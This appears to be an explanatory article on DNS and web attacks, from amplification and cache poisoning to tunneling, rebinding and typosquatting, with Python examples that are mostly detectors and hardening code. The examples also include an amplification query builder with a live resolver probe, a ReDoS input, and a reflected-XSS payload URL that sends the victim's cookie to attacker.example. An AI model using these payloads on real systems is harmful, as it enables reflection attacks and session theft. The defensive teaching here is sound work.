On the Anatomy of a DNS Attack – Types, Technical Capabilities, and Mitigation
DNS Attacks Come in Quite a Few Shapes and Sizes. Here Is Everything You Need to Know.
The Domain Name System (DNS), with its quirks, kinks, and compulsion to coin unnecessarily long acronyms, is a world of its own. At this point, any DNS treatise, article, paper, or cheat sheet makes the Encyclopedia Britannica’s letter “A” volume look like a “quit smoking” leaflet.
There’s a perfectly sound reason behind DNS’s complexity: almost everything happening in your web browser right now, including you reading this article, began with a DNS lookup. The article you’re about to read is dedicated to your friendly neighborhood hacker, probably the only person who can turn something as innocuous as a smart cooker into a full-fledged IED.
So, without further ado, let’s take a closer look at DNS attacks. I’ll be covering classification, techniques, and the available mitigations and fixes. Enjoy!
Common Types of DNS Attacks
#1 Denial-of-Service (DoS)
As far as descriptive acronyms go, DoS captures the essence of this type of cyber-attack. Short for Denial-of-Service, the attack bars legitimate users from a machine or a network, either by exhausting its resources or by crashing it outright. A lesser-known fact about DoS is that it is frequently used as a smokescreen: the noise hides the tracks of a parallel intrusion, or hampers the victim’s recovery efforts once the real damage is done.
DoS attacks come in several varieties, each leveraging a vulnerability, a protocol, system, or code limitation, or simply an unexpected reply from the target machine. They are commonly employed by threat actors going after high-value targets (HVTs) that have mature defenses.
DNS Amplification
DNS amplification, also called DNS reflection, is a technique that abuses the Domain Name System to multiply the traffic aimed at a target. The attacker sends a stream of small DNS queries to open recursive resolvers, with the source IP address forged (address spoofing) to be the victim’s address instead of the attacker’s own. The queries are chosen so that the answer is far larger than the question: an ANY query, or a TXT lookup on a domain with large records, with an EDNS0 option advertising a buffer of several kilobytes.
Every resolver answers every query, but the answers go to the spoofed source address, so the victim is hit by a flood of large UDP packets arriving from port 53 of resolvers it never queried. The ratio of response size to query size is the amplification factor; with DNS it can exceed 50, which is why a modest botnet can saturate a multi-gigabit link. Nothing in the victim’s network sends anything: the traffic is reflected off third-party servers, which also hides the attacker’s true source.
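To make the amplification factor concrete, here is an added example (not code from the original article) that builds a DNS query the way an attacker would, with an EDNS0 OPT record advertising a 4,096-byte UDP buffer, and computes the ratio against a constructed TXT answer. The zone data is made up for the demonstration; probe_resolver() is the only function that touches the network and is never called automatically.

```python
import socket
import struct

# Added example, not code from the original article. It builds a DNS query the
# way an amplification attacker does (EDNS0 OPT record advertising a large UDP
# buffer, a "fat" query type) and computes the amplification factor of the
# answer. The answer here is constructed in this file, not fetched from a real
# server; probe_resolver() is the only function that touches the network and
# is never called automatically.

QTYPE_TXT = 16
QTYPE_ANY = 255
QTYPE_OPT = 41
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    """'example.com' -> b'\\x07example\\x03com\\x00' (RFC 1035 labels)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("DNS labels are 1..63 bytes")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name: str, qtype: int, txid: int = 0x1234, udp_size: int = 4096) -> bytes:
    """12-byte header + one question + an EDNS0 OPT pseudo-record (ARCOUNT=1)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1)   # 0x0100: recursion desired
    question = encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)
    # OPT RR: root name, TYPE 41, CLASS carries the UDP payload size we accept,
    # TTL carries extended flags (none), RDLENGTH 0. This is what lets a
    # 40-byte query solicit a 4-kilobyte UDP answer.
    opt = b"\x00" + struct.pack("!HHIH", QTYPE_OPT, udp_size, 0, 0)
    return header + question + opt


def parse_header(packet: bytes) -> dict:
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", packet[:12])
    return {"id": txid, "is_response": bool(flags & 0x8000), "rcode": flags & 0xF,
            "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar}


def build_txt_response(query: bytes, txt_strings: list, ttl: int = 300) -> bytes:
    """Constructed answer to `query`: one TXT record per string (test data, not a real server)."""
    txid = struct.unpack("!H", query[:2])[0]
    # The question starts at offset 12; its name ends at the first 0x00 byte,
    # followed by 2 bytes of QTYPE and 2 of QCLASS.
    q_end = query.index(b"\x00", 12) + 5
    question = query[12:q_end]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(txt_strings), 0, 0)  # QR, RD, RA
    answers = b""
    for text in txt_strings:
        data = text.encode("ascii")
        rdata = b""
        for i in range(0, len(data), 255):                  # TXT = sequence of <len><chars>
            chunk = data[i:i + 255]
            rdata += bytes([len(chunk)]) + chunk
        # 0xC00C: compression pointer back to the question name at offset 12
        answers += b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_TXT, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answers


def amplification_factor(query: bytes, response: bytes) -> float:
    """Bytes received by the victim per byte sent by the attacker (UDP payload only;
    add the ~42 bytes of Ethernet/IP/UDP headers per packet for an on-the-wire figure)."""
    return len(response) / len(query)


def probe_resolver(ip: str, name: str = "example.com", timeout: float = 2.0):
    """Send one recursive query to `ip`; return (query_len, answer_len) or None if it stays
    silent. A server that answers recursive queries from arbitrary Internet hosts is an
    open resolver and can be used as a reflector. Only probe hosts you are allowed to test."""
    q = build_query(name, QTYPE_TXT)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(q, (ip, 53))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return None
    h = parse_header(data)
    if not h["is_response"] or h["id"] != parse_header(q)["id"]:
        return None
    return len(q), len(data)


def demo() -> float:
    """Constructed case: a 40-byte TXT query against a zone with long TXT records."""
    q = build_query("example.com", QTYPE_TXT)
    # Long SPF and verification-token style strings (constructed, not real records).
    records = ["v=spf1 " + "ip4:192.0.2.0/24 " * 40 + "-all"] + ["x" * 255] * 8
    return amplification_factor(q, build_txt_response(q, records))


if __name__ == "__main__":
    print(f"amplification factor: {demo():.1f}x")
```

The constructed zone yields a factor of roughly 72 from a single 40-byte query. Run probe_resolver() against your own resolvers from outside the network: if it returns a length pair, the resolver is open and is part of someone else’s attack capacity.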
Resource Depletion
First on the list is the resource depletion DoS attack. Yup, you’ve guessed it: the attacker aims to trigger a DoS condition on the victim’s machine by draining one of the device’s resource pools: CPU, memory, disk, or network.
For instance, the attacker can drive up the CPU consumption of a forum-type application by bombarding its search function with queries crafted to trigger catastrophic backtracking in a regular expression (a ReDoS), looped from a simple script. A pattern with nested quantifiers such as (a+)+$ takes time exponential in the input length when it fails to match, so a few hundred requests of a few dozen characters each can pin the CPU.
Memory depletion is another type of resource depletion attack; think of vulnerable email clients. A threat actor could trigger memory exhaustion simply by attaching hundreds of thousands of files to a draft mail: since unsent emails are held locally, filling them to the brim with junk can exhaust the machine’s memory.
How about disk depletion? As you know, most apps write logs, which are pretty useful for figuring out what went wrong with the app. A single log entry takes up just a few kilobytes.
However, by knowing which ‘buttons’ to push to recreate a specific error, the threat actor can force the application to fill all available disk space with log entries. Sure, it takes time, research, and resources on both sides, but it can be done.
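The CPU-depletion case above is easy to reproduce. The following is an added example (not code from the original article) showing the regex shape a ReDoS attacker looks for, an equivalent pattern without the problem, and the input-size guard a request handler should apply before any user-controlled matching; the patterns, inputs and the 64-character limit are constructed.

```python
import re
import time

# Added example, not code from the original article. It shows the regex shape a
# resource-depletion attacker looks for in a search feature, an equivalent
# pattern without the problem, and the input-size guard a request handler should
# apply before any user-controlled matching. Patterns and inputs are constructed.

# Nested quantifiers over overlapping matches: "aaaa" can be split into (a)(aaa),
# (aa)(aa), (a)(a)(aa)... and the trailing "$" makes the engine try every
# split before it can report failure, so the time doubles with each extra "a".
VULNERABLE = re.compile(r"^(a+)+$")

# Matches exactly the same strings, but there is only one way to match each one.
SAFE = re.compile(r"^a+$")

MAX_SEARCH_LEN = 64          # assumption: longest search term the forum accepts


def timed_match(pattern, text):
    """Return (matched, seconds) for pattern.match(text)."""
    start = time.perf_counter()
    matched = pattern.match(text) is not None
    return matched, time.perf_counter() - start


def backtracking_blowup(n: int):
    """Time both patterns on n 'a's followed by '!', which cannot match either one."""
    evil = "a" * n + "!"
    _, t_vulnerable = timed_match(VULNERABLE, evil)
    _, t_safe = timed_match(SAFE, evil)
    return t_vulnerable, t_safe


def search_guard(term: str) -> str:
    """What the request handler should do before the regex sees user input:
    bound the length (and, in production, run the match under a timeout or
    use a backtracking-free engine such as RE2)."""
    if len(term) > MAX_SEARCH_LEN:
        raise ValueError("search term too long")
    return term


if __name__ == "__main__":
    # Constructed demonstration: each extra 'a' roughly doubles the vulnerable time.
    for n in (16, 18, 20, 22):
        t_v, t_s = backtracking_blowup(n)
        print(f"n={n}: vulnerable {t_v:.4f}s  safe {t_s:.6f}s")
```

Watch the vulnerable column grow from milliseconds to seconds while the safe pattern stays flat; at n around 30 a single request occupies a core for minutes, and the attacker needs no more bandwidth than a browser.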
Buffer Overflow
A buffer overflow attack (BOA) exploits a limitation rather than a design feature: the program writes more data into a fixed-size buffer than it can hold, and the excess spills into adjacent memory. Overwriting whatever lived there, a neighboring variable, a heap chunk header, or control data on the stack, typically crashes the application, which is enough for a DoS. The problem is endemic to programs written in C and C++, whose standard memory and string routines perform no bounds checking.
Buffer overflows can also be employed for purposes other than DoS. When the overwritten data includes the saved frame pointer or the saved return address (the value loaded into the instruction pointer when the function returns), the attacker can redirect execution to code of their choosing.
ICMP Flood
Also called a ping flood, this kind of DoS attack abuses a common connectivity test to slow down, freeze, or render the target machine unreachable. Conventionally, the ICMP ping test is used to check reachability and round-trip time between two endpoints.
How this works is that a machine sends an ICMP echo request to another machine and the receiver sends back an echo reply. Measuring the round trip tells you how far away, in network terms, the other host is.
As you would imagine, an attacker can abuse the echo request-reply mechanism to overload the victim’s link and CPU by sending echo requests as fast as possible, each of which the victim must process and answer. Although it may sound like a good place to start if you were to DoS a target, the attack has a hard requirement: from a single source, the attacker’s bandwidth must exceed the victim’s, because the victim’s reply traffic is roughly equal to the inbound flood.
More than that, the attacker must know the victim’s IP address to aim the attack and, to judge whether it is working, something about the router in front of the victim, since many routers rate-limit or drop ICMP before it reaches the host.
SYN Flood
Also called a “half-open” attack, the SYN flood abuses the TCP three-way handshake.
I already covered the three-way handshake in a previous article. The attacker sends a stream of SYN packets, usually from spoofed source addresses, and never completes the handshake: the server answers each SYN with a SYN-ACK, allocates a connection-table entry, and waits for an ACK that never arrives. Once the backlog of half-open connections is full, new legitimate SYNs are dropped and users are denied service.
#2 Distributed Denial-of-Service (DDoS)
DDoS is to volume what DoS is to precision. Distributed Denial-of-Service attacks leverage compromised hosts (bots) to launch full-scale DoS-type attacks on large targets. So, non-technically speaking, DoS is the lone wolf, striking with surgical precision, while DDoS is the general who orders his soldiers into battle.
DDoS attacks occur more frequently than simple DoS attacks. Why? Bots and botnets are readily available for rent on the dark web, and volumetric attacks have higher odds of success than a single-source DoS. Enough about that; let’s see some types of DDoS attacks.
UDP Flood
Like the SYN flood, this type of DDoS targets the transport layer, but it leverages the connectionless User Datagram Protocol (UDP). The attacker floods random ports on the target with junk UDP packets, usually from spoofed sources.
For each packet, the host checks whether an application is listening on that port. Finding none, it replies with an ICMP Destination Unreachable (port unreachable) message. Receiving the packet, doing the lookup, and generating the reply all cost CPU and bandwidth, and with enough bots sending, this goes on until the host’s network resources are exhausted.
ICMP Flood
Works the same way as its DoS counterpart. The only difference is volume: a DDoS has hundreds or thousands of bots ICMP-flooding the victim at the same time, so the single-source bandwidth requirement no longer applies.
SYN Flood
Same mechanism as the DoS version, but more ‘zombies’ to do the heavy lifting, and more source addresses to spoof.
NTP Amplification
In Network Time Protocol (NTP) amplification attacks the threat actor sends small UDP requests to public-facing NTP servers with the source address forged to be the victim’s. The name of the attack comes from the query-to-response ratio: older ntpd versions answer the monlist command with a list of up to 600 recent clients, hundreds of times larger than the request. The servers do not crash; they dutifully send every oversized answer to the victim, which drowns under the reflected traffic.
HTTP Flood
A very efficient DDoS attack, leveraging ordinary HTTP GET or POST requests. The threat actor sends as many legitimate-looking GET or POST requests as the botnet can produce, forcing the server to handle each one, typically aimed at expensive pages such as search or login. The resource-intensive work of serving each request depletes the server, resulting in DoS. Because the requests are well-formed, volumetric filters do not catch them.
Fast Flux
Fast flux is a very flashy, Tron-reminiscent name for a way of masking botnet infrastructure. Technically it’s not an attack but an evasion method employed by botnet operators. The domain behind a phishing page or command-and-control server is answered with A records that have very short TTLs and point to a constantly rotating set of compromised hosts acting as proxies, so the address changes every few minutes and blocking any one IP achieves nothing; “double flux” rotates the name servers as well.
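Because fast flux lives in DNS, it leaves a measurable trace in resolver logs. Here is an added example (not code from the original article) that computes the classic fast-flux indicators over repeated lookups of two constructed domains; the observations, the IP-to-ASN table and the thresholds are all assumptions, and a real deployment would take the ASN from an external lookup and tune the thresholds against its own traffic.

```python
from collections import Counter

# Added example, not code from the original article. It scores domains for
# fast-flux behavior from a passive-DNS style record of repeated lookups. The
# observations, the IP-to-ASN table and the thresholds are all constructed;
# in practice the ASN comes from an external lookup and thresholds are tuned
# against the network's own traffic.

# (domain, observed_at, ttl_seconds, A records) from four lookups of each name
OBSERVATIONS = [
    ("cdn-static.example", 1_700_000_000, 3600, ["203.0.113.10", "203.0.113.11"]),
    ("cdn-static.example", 1_700_003_600, 3600, ["203.0.113.11", "203.0.113.10"]),
    ("cdn-static.example", 1_700_007_200, 3600, ["203.0.113.10", "203.0.113.11"]),
    ("cdn-static.example", 1_700_010_800, 3600, ["203.0.113.10", "203.0.113.11"]),
    ("login-verify.example", 1_700_000_000, 180, ["198.51.100.5", "198.51.100.77", "192.0.2.9"]),
    ("login-verify.example", 1_700_000_200, 120, ["198.51.100.14", "192.0.2.33", "203.0.113.201"]),
    ("login-verify.example", 1_700_000_400, 180, ["192.0.2.70", "198.51.100.120", "203.0.113.45"]),
    ("login-verify.example", 1_700_000_600, 150, ["198.51.100.201", "192.0.2.101", "203.0.113.99"]),
]

# Constructed stand-in for an IP-to-ASN lookup service.
ASN_BY_PREFIX = {"203.0.113.": 64500, "198.51.100.": 64501, "192.0.2.": 64502}


def asn_of(ip: str):
    for prefix, asn in ASN_BY_PREFIX.items():
        if ip.startswith(prefix):
            return asn
    return None


def flux_features(domain: str, observations=OBSERVATIONS) -> dict:
    rows = [o for o in observations if o[0] == domain]
    ips = Counter()
    asns = set()
    ttls = []
    changes = 0
    previous = None
    for _, _, ttl, a_records in rows:
        current = frozenset(a_records)          # order of round-robin answers is irrelevant
        ttls.append(ttl)
        ips.update(current)
        asns.update(asn_of(ip) for ip in current)
        if previous is not None and current != previous:
            changes += 1
        previous = current
    return {
        "lookups": len(rows),
        "unique_ips": len(ips),
        "unique_asns": len(asns - {None}),
        "min_ttl": min(ttls) if ttls else None,
        "answer_churn": changes / max(len(rows) - 1, 1),   # fraction of lookups that changed the set
    }


def is_fast_flux(f: dict, max_ttl=300, min_churn=0.5, min_asns=2, min_ips=6) -> bool:
    """Heuristic (assumed thresholds): short TTLs, answers that keep changing, and addresses
    spread over several networks. A CDN also has low TTLs and several ASNs, but its answer
    set is stable and its ASNs are those of a known provider, so keep an allow-list."""
    return (f["lookups"] >= 2 and f["min_ttl"] is not None and f["min_ttl"] <= max_ttl
            and f["answer_churn"] >= min_churn and f["unique_asns"] >= min_asns
            and f["unique_ips"] >= min_ips)


def flagged_domains(observations=OBSERVATIONS) -> list:
    domains = sorted({o[0] for o in observations})
    return [d for d in domains if is_fast_flux(flux_features(d, observations))]
```

The CDN-style name keeps the same two addresses in one network across every lookup; the phishing name hands out twelve different addresses in three networks within ten minutes. Feed the function from your resolver’s query log or a passive-DNS source, and treat the allow-list of known CDN ASNs as part of the detector, not an afterthought.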
Reflected Cross-Site Scripting (XSS)
During a reflected cross-site scripting (XSS) attack, the threat actor abuses the HTTP response of an application that echoes part of the request back into the page, kind of like an echo. The first step is to discover whether the application performs any validation or output encoding on the data it reflects.
Here’s a quick example. Some websites mirror back your search terms: search for “cat food” and you get a page saying <<you searched for: “cat food”>>. On an unsecured website, a threat actor can put a script fragment in the search parameter of the URL instead of a search term; the server inserts it into the page verbatim and the browser runs it, resulting in an XSS attack.
The best thing about this, from the attacker’s point of view: the script does not run in the attacker’s browser. The blow is dealt to whoever clicks the crafted link, typically delivered by phishing mail, and the script executes with that victim’s session on the site.
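The search-echo page above, as an added example that is not code from the original article: the vulnerable handler reflects the raw parameter, the hardened one encodes for the HTML text context and adds a Content-Security-Policy header. The URL, the payload and the handler signatures are constructed and stand in for a real framework’s view functions.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Added example, not code from the original article. It reproduces the
# search-echo page the text describes: first the vulnerable handler, then one
# hardened with output encoding and a Content-Security-Policy header. The URL,
# the payload and the handler signatures are constructed; they stand in for a
# real framework's view functions.

# What the attacker mails to the victim: the search parameter holds a script
# that ships the session cookie to attacker.example (constructed).
PAYLOAD_URL = ("/search?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example"
               "%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E")


def query_term(url: str) -> str:
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(url: str) -> str:
    """Reflects the raw term into the HTML body; whatever the URL carried now runs
    in the victim's browser under the site's origin."""
    return f"<p>You searched for: {query_term(url)}</p>"


def render_safe(url: str):
    """Encode for the HTML text context, then add headers that blunt the attack even
    if some other page forgets to encode."""
    term = html.escape(query_term(url), quote=True)
    body = f"<p>You searched for: {term}</p>"
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        # No inline script may execute, so a reflected <script> block is dead on arrival.
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


def contains_script(body: str) -> bool:
    return "<script" in body.lower()
```

The encoding shown is right for text between tags only; a term reflected into an attribute, a URL, or a script block needs the encoder for that context, which is why templating engines that encode by default beat hand-written f-strings.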
#3 DNS Hijacking
When a DNS hijacking attack takes place, the attacker manipulates the resolution of a query so that it is redirected to a server they control. By doing so, they can send visitors to a malicious look-alike site without their knowledge. This is also known as DNS redirection; cache poisoning, covered below, is one of the ways of pulling it off.
Unfortunately, DNS hijacking is also very common in the realm of cybercrime. A 2021 study found that 47% of responding companies said they had experienced this kind of attack, and 33% also reported cache poisoning, a closely related technique.
A DNS hijacking operation may also involve subverting or changing the behavior of a legitimate DNS server. This is done not only by hackers running phishing campaigns but by otherwise reputable parties like your Internet service provider: ISPs redirect queries to gather statistics, display adverts, and for other self-serving uses. DNS service providers may also use hijacking as a form of censorship to prevent access to particular pages.
DNS Spoofing
DNS spoofing, also known as DNS cache poisoning, is a method used by cybercriminals to make your resolver hand you the address of a fake website instead of the one you intended to visit. When a resolver asks for a name and accepts a forged answer carrying the wrong IP address, usually one raced in by the attacker before the genuine answer arrives, and then caches it, every later client of that resolver is sent to the wrong place until the record expires.
DNS spoofing can affect any resolver, Microsoft Windows Server DNS and BIND included. A hacker who controls the resolution of the domain you are trying to reach can serve you a page that leads you to assume you are on the legitimate site, when in fact you are on a fake one that may be laced with malware. Websites are not the only thing at risk: if the poisoned record points to a mail server, the attacker can intercept email and other private data as well.
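The reason a forged answer is hard to get accepted today comes down to a handful of checks on the resolver. The following is an added example (not code from the original article) that models those checks and shows which ones a blind spoofer fails; records are simple tuples instead of wire format, and all names, addresses and the zone are constructed.

```python
import secrets
from dataclasses import dataclass, field

# Added example, not code from the original article. It models the checks a
# resolver must apply to an answer before caching it, and shows which of them a
# blind spoofer fails. Records are (name, type, value) tuples rather than wire
# format; all names, addresses and the zone are constructed.


@dataclass
class Pending:
    txid: int            # 16-bit transaction ID we chose
    src_port: int        # ephemeral UDP port we sent from
    qname: str
    qtype: str
    server: str          # address the query went to


@dataclass
class Response:
    txid: int
    dst_port: int        # port the packet arrived on
    from_addr: str
    qname: str
    qtype: str
    answers: list = field(default_factory=list)      # (name, type, value)
    additional: list = field(default_factory=list)   # (name, type, value)


def send_query(qname: str, qtype: str, server: str) -> Pending:
    # Random ID plus a random source port: a blind spoofer must guess ~2^32 values
    # in the round-trip window instead of the 2^16 that a fixed port allowed
    # (the weakness behind the 2008 Kaminsky attack).
    return Pending(secrets.randbelow(1 << 16), 1024 + secrets.randbelow(65536 - 1024),
                   qname, qtype, server)


def in_bailiwick(name: str, zone: str) -> bool:
    name, zone = name.lower().rstrip("."), zone.lower().rstrip(".")
    return name == zone or name.endswith("." + zone)


def accept_response(p: Pending, r: Response, zone: str):
    """Return the records that may be cached, or None if the packet must be dropped.
    `zone` is the zone the queried server is authoritative for."""
    if r.from_addr != p.server:                        # not from the server we asked
        return None
    if r.txid != p.txid or r.dst_port != p.src_port:   # ID or port does not match
        return None
    if (r.qname.lower(), r.qtype) != (p.qname.lower(), p.qtype):   # question must match
        return None
    # Bailiwick rule: a server for bank.example may not tell us about other zones,
    # even in the additional section, where Kaminsky-style poison was carried.
    return [rec for rec in r.answers + r.additional if in_bailiwick(rec[0], zone)]


def demo():
    p = send_query("www.bank.example", "A", "192.0.2.53")   # 192.0.2.53: ns1.bank.example (constructed)
    genuine = Response(p.txid, p.src_port, "192.0.2.53", "www.bank.example", "A",
                       answers=[("www.bank.example", "A", "203.0.113.10")],
                       additional=[("ns1.bank.example", "A", "192.0.2.53"),
                                   ("www.mail-provider.example", "A", "198.51.100.66")])  # off-bailiwick
    # Spoofer knows the question and fakes the source address, but guessed the ID wrong.
    forged = Response(p.txid ^ 0x0001, p.src_port, "192.0.2.53", "www.bank.example", "A",
                      answers=[("www.bank.example", "A", "198.51.100.99")])
    return accept_response(p, genuine, "bank.example"), accept_response(p, forged, "bank.example")
```

Note what the checks do not cover: an attacker on the path who can read the query sees the ID and port and passes every test. That is the case only DNSSEC validation (or an encrypted transport to a trusted resolver) closes.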
DNS Tunneling
DNS tunneling is a method of routing other network traffic through the DNS, establishing an additional channel for data to travel. Because almost every network lets DNS queries out, this is a way to get through network filters and firewalls, among other things.
The DNS converts domain names into IP addresses, and a tunnel abuses that exchange: outbound data is encoded into the labels of queries for names under a domain the operator controls, and inbound data comes back in the answers (TXT, NULL, or CNAME records). DNS tunneling is not inherently evil; some connectivity tools use it precisely to get traffic out of captive portals and networks that allow nothing but DNS.
Unfortunately, hackers frequently use the procedure for malicious ends. Used maliciously, DNS tunneling is an attack strategy in which stolen data, or command-and-control traffic, is delivered via DNS queries. It can be used to avoid filtering or firewall detection and to secretly move data across networks that would normally block such traffic. The tell-tale signs are a domain that receives a large number of unique, long, high-entropy subdomain queries, and an unusual share of TXT or NULL queries.
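Those tell-tale signs can be computed directly from a resolver log. Here is an added example (not code from the original article) that builds per-domain statistics and flags the tunnel profile; the log lines are constructed, the registered-domain split is deliberately crude, and the thresholds are assumptions to tune against a week of your own traffic.

```python
import math
from collections import Counter, defaultdict

# Added example, not code from the original article. It computes per-domain
# statistics over a query log and flags the profile a DNS tunnel leaves: many
# unique, long, high-entropy subdomains under one zone, often with TXT or NULL
# query types. The log lines and the thresholds are constructed; tune the
# thresholds against a week of your own resolver logs.

LOG = """\
1700000000 10.0.0.12 A www.example.com
1700000001 10.0.0.12 A cdn.example.net
1700000002 10.0.0.12 AAAA mail.example.com
1700000003 10.0.0.31 TXT mfrggzdfmztwq2lk.bzxhi6lhmvuw4zlt.t.exfil.example
1700000004 10.0.0.31 TXT onqwg5lpnfzwc3tp.nzsw45dsmfrwyid.t.exfil.example
1700000005 10.0.0.31 TXT mjqxg4zamfxgiidunbqxiidpmywgszdz.t.exfil.example
1700000006 10.0.0.31 TXT pnqwk3tumvqw4zbamfrgg2lsnzxw6id.t.exfil.example
1700000007 10.0.0.31 NULL ivxgiidwmfwhkzlt.ihqwk4zz.t.exfil.example
1700000008 10.0.0.12 A www.example.com
"""

RARE_TYPES = {"TXT", "NULL"}


def split_domain(qname: str):
    """Crude registered-domain split (last two labels); a real deployment uses the Public
    Suffix List so that names like foo.co.uk are handled correctly."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parse_log(text: str) -> list:
    rows = []
    for line in text.strip().splitlines():
        ts, client, qtype, qname = line.split()
        rows.append((int(ts), client, qtype, qname))
    return rows


def domain_stats(rows: list) -> dict:
    by_domain = defaultdict(list)
    for _, _, qtype, qname in rows:
        domain, sub = split_domain(qname)
        by_domain[domain].append((qtype, sub))
    stats = {}
    for domain, items in by_domain.items():
        subs = [sub for _, sub in items]
        n = len(items)
        stats[domain] = {
            "queries": n,
            "unique_sub_ratio": len(set(subs)) / n,
            "avg_sub_len": sum(len(s) for s in subs) / n,
            "avg_entropy": sum(shannon_entropy(s.replace(".", "")) for s in subs) / n,
            "rare_type_ratio": sum(1 for qtype, _ in items if qtype in RARE_TYPES) / n,
        }
    return stats


def looks_like_tunnel(s: dict, min_queries=4) -> bool:
    return (s["queries"] >= min_queries
            and s["unique_sub_ratio"] > 0.9        # almost every query is a new name: encoded payload
            and s["avg_sub_len"] > 25              # far longer than "www" or "mail"
            and (s["avg_entropy"] > 3.0 or s["rare_type_ratio"] > 0.5))


def detect_tunnels(log_text: str) -> list:
    stats = domain_stats(parse_log(log_text))
    return sorted(d for d, s in stats.items() if looks_like_tunnel(s))
```

Expect false positives from anti-virus vendors and certain CDNs, which legitimately encode lookups into long unique subdomains; build the allow-list from a baseline before alerting, and keep the query volume per client as a second signal.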
DNS Rebinding
DNS rebinding is a cyberattack method that turns the victim’s own browser into a proxy to services on the victim’s local network. The attacker registers a domain and answers queries for it with a very short TTL. The victim’s browser first receives the attacker’s public IP, loads a page carrying a malicious script, and then, when the script makes its next request to the same name, the attacker’s DNS server answers with a private address such as the router’s or a device on the LAN. The browser’s same-origin policy keys on the name, not the address, so the script may now read responses from the internal host. The attack works from any internet-connected device, including smartphones, requires no authentication, and only needs the victim to keep the page open for a short while.
Using this flaw, the attacker can reach anything that trusts the local network: home routers, IoT devices, development servers listening on localhost, and the management interfaces of network-attached storage. Whatever the internal service lets an unauthenticated request do, the attacker can do through the victim’s browser.
For example, if your home router’s admin page is reachable at 192.168.1.1 without a password, a rebinding page left open in a tab can change the router’s DNS settings, at which point every lookup from your home, including www.mybankname.com, goes wherever the attacker wants.
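Two defenses stop the scenario above, one on the resolver and one on the device. The following is an added example (not code from the original article): rebind_filter() does what a resolver option such as dnsmasq’s --stop-dns-rebind does, refusing private-range answers for external names, and host_header_ok() is the service-side check that makes a rebound request useless. Names, addresses and the internal zone list are constructed.

```python
import ipaddress

# Added example, not code from the original article. It implements two of the
# standard defenses against DNS rebinding. rebind_filter() is what a resolver
# option such as dnsmasq's --stop-dns-rebind does: refuse answers for external
# names that point into private, loopback or link-local space. host_header_ok()
# is the service-side check: a device on the LAN answers only requests whose
# Host header names itself, so a script running under attacker.example's origin
# gets nothing back even if the rebind succeeds. Names, addresses and the
# internal zone list are constructed.

PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10",
)]

# Assumption: only these zones are allowed to resolve to private addresses.
INTERNAL_ZONES = {"corp.example"}


def is_internal_address(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:   # ::ffff:192.168.0.5 is still 192.168.0.5
        addr = addr.ipv4_mapped
    return any(addr in net for net in PRIVATE_NETS)


def rebind_filter(qname: str, answers: list) -> list:
    """Return the answers the resolver may pass to the client."""
    name = qname.lower().rstrip(".")
    if any(name == z or name.endswith("." + z) for z in INTERNAL_ZONES):
        return list(answers)
    return [ip for ip in answers if not is_internal_address(ip)]


def host_header_ok(host_header: str, own_names: set, own_addresses: set) -> bool:
    """Service-side check: accept the request only if Host is one of our own names or
    addresses. Strips a port suffix and brackets around an IPv6 literal."""
    host = host_header.strip().lower()
    if host.startswith("["):
        host = host[1:host.index("]")]
    elif host.count(":") == 1:
        host = host.rsplit(":", 1)[0]
    return host in {n.lower() for n in own_names} or host in own_addresses


def demo():
    # Phase 1: attacker.example resolves to the attacker's public server; the page loads.
    phase1 = rebind_filter("attacker.example", ["203.0.113.7"])
    # Phase 2: the 1-second TTL expires and the same name now answers with the home router.
    phase2 = rebind_filter("attacker.example", ["192.168.1.1"])
    # An internal zone legitimately answering with private space is left alone.
    internal = rebind_filter("printer.corp.example", ["10.1.2.3"])
    # Without the filter, the rebound request still says "Host: attacker.example";
    # the router rejects it, while a real admin visit with Host: 192.168.1.1:8080 passes.
    on_router = host_header_ok("attacker.example", {"router.local"}, {"192.168.1.1"})
    admin = host_header_ok("192.168.1.1:8080", {"router.local"}, {"192.168.1.1"})
    return phase1, phase2, internal, on_router, admin
```

The resolver filter is the cheaper control and protects every device behind it, but it cannot help a laptop that uses a public resolver on a café network; the Host-header check is what every service that listens on a LAN or on localhost should ship with.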
DNS Typosquatting
A social engineering technique inspired by DNS hijacking, DNS typosquatting takes advantage of typos and misspellings in domain names. A typical typosquatting attack starts with the attacker registering a domain name that is purposely misspelled or looks close to the target website’s domain name.
The attacker then develops a fake website with material designed to persuade users to provide sensitive information, including login passwords, credit card details, and other personal data. Using www.paypall.com in place of www.paypal.com, or www.applid.com in place of www.appleid.com, would be two examples of typosquatting domains.
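Defenders play the same game in reverse: generate the variants a squatter would register and watch for them, or score observed domains against a brand list. The following is an added example (not code from the original article) doing both; the keyboard-neighbor map, the brand watch-list and the sample names are constructed.

```python
# Added example, not code from the original article. It generates the typo
# variants a squatter would register for a brand's domain label and scores an
# observed domain against a watch-list of brands by edit distance, which is how
# a brand-protection or mail-filtering rule would catch www.paypall.com. The
# keyboard map, the brand list and the test names are constructed.

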